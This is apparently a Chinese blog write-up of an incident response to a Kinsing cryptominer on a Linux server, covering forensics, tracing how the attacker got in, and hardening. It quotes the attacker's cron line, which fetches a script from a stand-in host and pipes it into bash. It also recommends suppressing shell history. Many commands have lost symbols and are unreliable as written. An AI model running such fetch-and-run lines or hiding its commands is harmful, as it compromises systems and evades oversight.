当前位置: 首页 > article >正文

Linux系统遭挖矿入侵:从异常告警到根因定位的实战排查指南

1. 告警触发CPU异常飙升的第一反应那天凌晨3点我正在睡梦中手机突然疯狂震动。打开一看监控系统连续发了十几条告警某台线上服务器的CPU使用率突破95%持续时间已超过15分钟。这种半夜告警最让人头疼但经验告诉我CPU持续高位运行很可能是挖矿木马的典型特征。我立刻用笔记本连上VPN注此处按规范要求已删除VPN相关描述通过跳板机登录目标服务器。第一件事就是执行HISTFILE/dev/null这个技巧很多新手不知道——它能让当前会话的所有命令不记录到.bash_history里避免污染历史记录。接着用uptime确认负载情况果然看到1分钟负载值达到32.15这台8核机器的负载红线是8明显异常。这时候千万别急着kill进程或重启。去年我就吃过亏当时直接杀了高CPU进程结果导致入侵痕迹全毁最后只能重装系统。正确的做法是先保持现场用top观察进程列表。果然发现一个名为kinsing的陌生进程占用了780%的CPU是的Linux下CPU百分比可以超过100%这是多核累加值。这个名称很可疑——正常系统进程不会叫这种名字。2. 立体化进程排查揪出隐藏的挖矿家族单看top输出还不够全面。我习惯用组合拳排查ps -aux --sort-pcpu | head -20 # CPU占用TOP20 ps -elf | grep -v \[.*\] # 过滤内核线程 pstree -p -s PID # 查看进程树发现kinsing进程的父进程是/tmp/.X11-unix/.rsync/cron这路径明显不正常。继续用lsof -p PID查看该进程打开的文件发现它还在读写/etc/ld.so.preload——这是LD_PRELOAD劫持的经典手法攻击者通过预加载恶意so文件实现进程注入。更麻烦的是用ls -lh /proc/PID/exe查看时竟然返回permission denied。这说明进程可能已经脱壳运行常规方法查不到真实路径。这时候需要上内存分析gdb -p PID (gdb) info proc mappings (gdb) dump memory /tmp/dump 0x7fxxxxxx 0x7fyyyyyy (gdb) detach strings -n 10 /tmp/dump | grep http\|wget\|curl在内存dump中发现了矿池地址stratumtcp://xmr.pool.domain:3333实锤了是门罗币挖矿程序。同时找到个有趣的字符串/dev/shm/.ICE-unix/.config去该目录一看果然藏着编译好的挖矿二进制文件。3. 网络取证异常连接的蛛丝马迹挖矿程序必须联网才能工作网络痕迹往往比进程更持久。我常用这个命令组合netstat -antp | grep ESTABLISHED ss -tulnp | awk {if($1!Netid) print $5} | cut -d: -f1 | sort | uniq -c lsof -i -P -n | grep -v ESTABLISHED发现大量到巴西、乌克兰IP的TCP连接端口都是3333或5555常见矿池端口。更诡异的是有个ESTABLISHED连接对应的进程显示为[kworker/1:3-events]这明显是伪装——内核线程不可能有外部连接。用ls -l /proc/PID/exe查看果然指向/usr/libexec/gnome-terminal-server被替换了。这时候rpm -Va就派上用场了输出显示S.5....T. /usr/bin/netstat .M....... /bin/ps前8位校验码异常表示这些命令被篡改过。特别是netstat被加了S文件大小改变、5MD5校验改变、T修改时间改变标记。这就是为什么有些运维人员查不出问题——他们用的排查工具本身已经被黑客动了手脚。4. 入侵溯源三大入口的排查策略找到挖矿程序只是开始更重要的是找到入侵路径。我通常会从三个方向入手4.1 用户登录审计last -aiwx | grep -v reboot\|wtmp grep Accepted password /var/log/secure* | awk {print $11} | sort | uniq -c cat /etc/passwd | grep -v nologin\|false发现有个名为systemd-network的账号最近登录过但正常情况这个系统账号应该被锁定。检查/etc/shadow发现该账号居然有密码哈希值明显是后门账户。4.2 计划任务排查ls -la /var/spool/cron/crontabs/ cat /etc/crontab | grep -v ^#\|^$ find /etc/cron* -type f -exec ls -la {} \;在/etc/cron.hourly里发现个名为.systemd的脚本内容是这样的#!/bin/sh curl -s http://malicious.domain/kinsing | bash /dev/null4.3 启动项检查ls -la /etc/rc.d/rc3.d/ chkconfig --list | grep -v 0:off\|1:off\|2:off\|3:off\|4:off\|5:off\|6:off发现/etc/rc.local被追加了/usr/sbin/ntpdate启动项实际是伪装的挖矿程序。攻击者还贴心地把原文件属性时间都改成了系统安装时的日期不仔细看根本发现不了。5. 清理加固亡羊补牢的正确姿势确认所有入侵点后我按照这个顺序处理备份证据将恶意文件、内存dump、日志全部打包加密tar czvf evidence.tar.gz /tmp/dump /dev/shm/.ICE-unix /etc/cron.hourly/.systemd清理恶意组件# 杀进程 kill -9 PID # 删文件 find / -name kinsing -exec rm -fv {} \; # 修复被篡改命令 rpm --setperms net-tools rpm --setperms procps-ng加固系统# 关闭无用端口 firewall-cmd --remove-port5555/tcp --permanent # 安装检测工具 yum install aide -y aide --init mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz最后修改SSH配置禁止root登录和密码认证sed -i s/#PermitRootLogin yes/PermitRootLogin no/ /etc/ssh/sshd_config echo PasswordAuthentication no /etc/ssh/sshd_config整个排查过程持续了2小时但真正耗时的是后续的重装Nginx、恢复备份等收尾工作。这次事件让我养成了新习惯所有服务器都配置aide做文件完整性检查关键业务机额外部署osquery做行为监控。安全防护就像洋葱必须有多层防御才够稳妥。

相关文章:

Linux系统遭挖矿入侵:从异常告警到根因定位的实战排查指南

1. 告警触发:CPU异常飙升的第一反应 那天凌晨3点,我正在睡梦中,手机突然疯狂震动。打开一看,监控系统连续发了十几条告警:某台线上服务器的CPU使用率突破95%,持续时间已超过15分钟。这种半夜告警最让人头疼…...

YOLOv8模型来实现自动化建筑结构健康监测 建筑裂缝检测数据集的训练及应用 可用于建筑物 桥梁道路墙面

YOLOv8模型来实现自动化建筑结构健康监测 建筑裂缝检测数据集的训练及应用 可用于建筑物 桥梁道路墙面 文章目录✅ 一、系统环境搭建1. 确认 CUDA 驱动(GPU 加速)2. 安装 Anaconda(Python 包管理器)3. 创建 Python 虚拟环境4. 安装…...

从若依(RuoYi)漏洞看SpringBoot项目常见安全坑:开发中如何避免SQL注入与路径遍历?

从若依漏洞剖析SpringBoot项目安全防御体系:SQL注入与路径遍历实战解决方案 最近在代码审计中遇到几个典型漏洞案例,让我意识到很多开发者对SpringBoot项目的安全防护仍停留在理论层面。以若依(RuoYi)这类流行框架为例,其SQL注入和任意文件下…...

移相全桥变换器原理及优缺点

一、引言在中大功率 DC-DC 变换领域(100W~10kW),移相全桥(Phase-Shifted Full-Bridge, PSFB)变换器凭借软开关特性、高效率、高功率密度、低电磁干扰等优势,成为当之无愧的主流拓扑。它完美解决了硬开关全桥…...

嵌入式系统事件控制与连续处理架构设计

1. 嵌入式系统的事件控制连续处理架构解析 在工业自动化领域,嵌入式系统需要同时应对两种截然不同的处理需求:一方面要持续不断地处理传感器采集的实时数据流,另一方面又必须及时响应各种异步事件(如用户指令、设备状态变化等&…...

mysql如何进行全量数据库备份_mysqldump工具的使用技巧

备份前必须确认用户具备SELECT、LOCK TABLES、RELOAD权限,且MySQL未启用read_onlyON、max_allowed_packet足够大;全量备份需加--routines、--events、--triggers、--single-transaction和--set-gtid-purgedOFF。备份前必须确认的三个权限和状态用 mysqld…...

宝塔面板SSH提示连接被拒绝_检查服务器端口开关

SSH连接被拒绝需依次排查sshd服务状态、系统防火墙、宝塔防火墙及云平台安全组:先用systemctl status sshd确认运行,再检查firewalld/ufw和宝塔安全页面端口放行,最后核查云厂商安全组规则是否开放22端口。宝塔面板SSH连接被拒绝,…...

别再死记硬背了!用Python实战案例带你搞懂决策树、随机森林到XGBoost的进化史

从决策树到XGBoost:用Python实战演绎机器学习模型的进化之路 在机器学习领域,树模型家族以其直观的解释性和出色的预测能力,始终占据着重要地位。但很多学习者在接触决策树、随机森林、XGBoost等一系列算法时,常常陷入孤立记忆公式…...

golang如何实现滑动窗口计数器_golang滑动窗口计数器实现思路

滑动窗口计数器不能只用map定时清理,因会漏统计非整点对齐的请求;必须保留带时间戳事件或时间分片,常用环形数组实现,按需shift比ticker更精准高效。滑动窗口计数器为什么不能只用 map 定时清理直接用 map[string]int 存请求次数…...

保姆级教程:Windows下ComfyUI环境配置,从驱动到CUDA再到PyTorch版本一条龙搞定

Windows下ComfyUI环境配置全攻略:从驱动到CUDA再到PyTorch版本一站式解决方案 在AI绘画领域,ComfyUI以其强大的功能和灵活的节点式操作赢得了众多用户的青睐。然而,对于许多初学者来说,环境配置往往成为第一道难以逾越的门槛。本文…...

生成式AI应用搜索排名暴跌?5个致命误区正在毁掉你的流量,立即排查!

第一章:生成式AI应用搜索排名暴跌的真相诊断 2026奇点智能技术大会(https://ml-summit.org) 近期大量生成式AI工具类网站在Google、Bing等主流搜索引擎中出现断崖式排名下滑,部分产品关键词自然流量下降超70%。这一现象并非偶然算法更新所致&#xff0c…...

深度学习之移动端部署(一)--MobileNetV1 轻量化设计解析

1. 为什么移动端需要轻量化模型? 当你用手机拍照时,是否想过背后的AI是如何实时识别人脸或物体的?这背后离不开轻量化神经网络的支持。传统CNN如VGG16拥有1.38亿参数,相当于500本《新华字典》的文字量,而MobileNetV1仅…...

从零上手Apache Zeppelin:一站式交互式数据分析平台实战

1. Apache Zeppelin初探:数据分析师的瑞士军刀 第一次接触Apache Zeppelin是在三年前的一个数据仓库迁移项目里。当时团队需要同时处理Hive、Spark和MySQL三种数据源,每天在不同终端间切换得头晕眼花。直到有位同事扔给我一个8080端口的链接:…...

Matlab 5G NR信道建模实战:CDL信道API参数配置与性能分析

1. 5G NR信道建模入门:为什么选择CDL模型? 如果你正在研究5G通信系统,信道建模绝对是你绕不开的关键环节。我在去年参与的一个毫米波通信项目中,就深刻体会到准确信道建模的重要性。当时我们尝试了多种建模方法,最终发…...

实战指南:基于Pytorch与BiSeNet,从零构建无人机遥感图像语义分割数据集训练流程

1. 环境准备与项目初始化 第一次接触无人机遥感图像处理时,我被高分辨率图像中的丰富细节震撼到了。但随之而来的问题是:如何在普通显卡上高效处理这些"庞然大物"?经过多次实践,我总结出一套适合个人开发者的解决方案。…...

WaveTools鸣潮工具箱:终极免费工具让游戏体验全面升级

WaveTools鸣潮工具箱:终极免费工具让游戏体验全面升级 【免费下载链接】WaveTools 🧰鸣潮工具箱 项目地址: https://gitcode.com/gh_mirrors/wa/WaveTools 你是否正在寻找一款能够彻底释放《鸣潮》游戏潜力的专业级工具?WaveTools鸣潮…...

KMS_VL_ALL_AIO:终极Windows和Office激活解决方案完整指南

KMS_VL_ALL_AIO:终极Windows和Office激活解决方案完整指南 【免费下载链接】KMS_VL_ALL_AIO Smart Activation Script 项目地址: https://gitcode.com/gh_mirrors/km/KMS_VL_ALL_AIO 还在为Windows系统激活问题烦恼吗?KMS_VL_ALL_AIO是一款开源免…...

基于深度学习的实时手语翻译系统架构设计与实现

基于深度学习的实时手语翻译系统架构设计与实现 【免费下载链接】Sign-Language-Interpreter-using-Deep-Learning A sign language interpreter using live video feed from the camera. 项目地址: https://gitcode.com/gh_mirrors/si/Sign-Language-Interpreter-using-Dee…...

WarcraftHelper终极指南:5个简单步骤让魔兽争霸3在现代Windows系统完美运行

WarcraftHelper终极指南:5个简单步骤让魔兽争霸3在现代Windows系统完美运行 【免费下载链接】WarcraftHelper Warcraft III Helper , support 1.20e, 1.24e, 1.26a, 1.27a, 1.27b 项目地址: https://gitcode.com/gh_mirrors/wa/WarcraftHelper 还在为魔兽争霸…...

Hunyuan-MT-7B开源镜像:Pixel Language Portal与LangChain集成构建翻译Agent

Hunyuan-MT-7B开源镜像:Pixel Language Portal与LangChain集成构建翻译Agent 1. 项目概览 Pixel Language Portal(像素语言跨维传送门)是一款基于腾讯Hunyuan-MT-7B大模型构建的创新翻译工具。不同于传统翻译软件的呆板界面,它采…...

端到端 RAG 实战:用 LangChain 搭建 PDF 问答系统

一、今天要做什么 前 6 天我们逐一学习了 RAG 的每个核心组件: Day01:RAG 整体架构Day02:文本分块(Chunking)Day03:Embedding 模型Day04:向量数据库Day05:检索策略Day06&#xff1…...

海报颜色选择指南:选对色彩,让海报更具吸引力

色彩是海报视觉传达的核心要素,比文字、图形更能快速抓住受众目光,传递情绪与信息。选对海报颜色,不仅能提升整体设计质感,还能强化信息传递效率,让海报在众多视觉素材中脱颖而出;反之,色彩搭配…...

C语言的发展及其版本

如果您是一名入门学者,或者您还不理解什么是编程语言,请查看:什么是编程语言。 如果您之前未接触任何编程语言,或者您不理解为什么学习C语言,请查看:为什么C语言是首选。 C语言于1972年11月问世&#xff0c…...

国产化迁移笔记:在龙芯/飞腾的银河麒麟V10中,为OpenJDK 8补全Icedtea-netx插件全记录

国产化迁移实战:在银河麒麟V10中为OpenJDK 8补全Icedtea-netx插件全流程解析 当企业级应用从传统x86架构向国产化平台迁移时,Java Web Start技术的兼容性问题往往成为拦路虎。最近在将某金融系统迁移到龙芯3A5000平台时,我们遇到了一个典型场…...

运放稳定性分析:电阻电容组合对波特图零点极点的影响

1. 从洗澡水温度理解波特图与零极点 想象一下你正在调节淋浴的水温。刚开始转动混水阀时,水温变化很快,但随着接近舒适温度,变化速度会逐渐放缓。这个过程中有两个关键点:一个是水温开始变化的起始点(类似零点&#xf…...

从SAD到SGBM:双目立体视觉核心匹配算法演进与实战解析

1. 双目立体视觉的基石:为什么需要匹配算法? 第一次接触双目立体视觉时,我盯着左右两个摄像头拍摄的画面看了半天也没想明白:明明是两个普通2D图像,怎么就能变出深度信息?后来才发现,这个魔术的…...

别再只用Image Asset了!Android Studio图标生成的隐藏技巧与实战避坑

别再只用Image Asset了!Android Studio图标生成的隐藏技巧与实战避坑 在安卓应用开发中,图标作为用户对产品的第一印象,其适配质量直接影响应用的专业度和用户体验。虽然Android Studio的Image Asset工具简化了图标生成流程,但许多…...

幻境·流金入门必看:DiffSynth-Studio+玄金美学环境搭建详解

幻境流金入门必看:DiffSynth-Studio玄金美学环境搭建详解 “流光瞬息,影画幻成。” 你是否曾幻想过,只需输入一段文字描述,就能在十几秒内获得一张细节丰富、质感堪比电影画面的高清图像?这听起来像是科幻电影里的场景…...

ANSYS面载荷施加避坑指南:SFL、SFA、SFE命令的区别与SFFRAN转换时机

ANSYS面载荷施加避坑指南:SFL、SFA、SFE命令的区别与SFFRAN转换时机 在ANSYS结构分析中,面载荷的施加是建模过程中最容易出现问题的环节之一。许多工程师虽然掌握了基本命令语法,但在实际应用中常常遇到载荷显示异常、计算结果不符预期等问题…...

Qwen3-32B智能问答系统搭建:基于API的快速开发指南

Qwen3-32B智能问答系统搭建:基于API的快速开发指南 1. 环境准备与快速部署 在开始使用Qwen3-32B构建智能问答系统前,我们需要完成基础环境准备。Qwen3-32B作为320亿参数的大型语言模型,其API调用方式既简单又高效。 1.1 获取API访问凭证 …...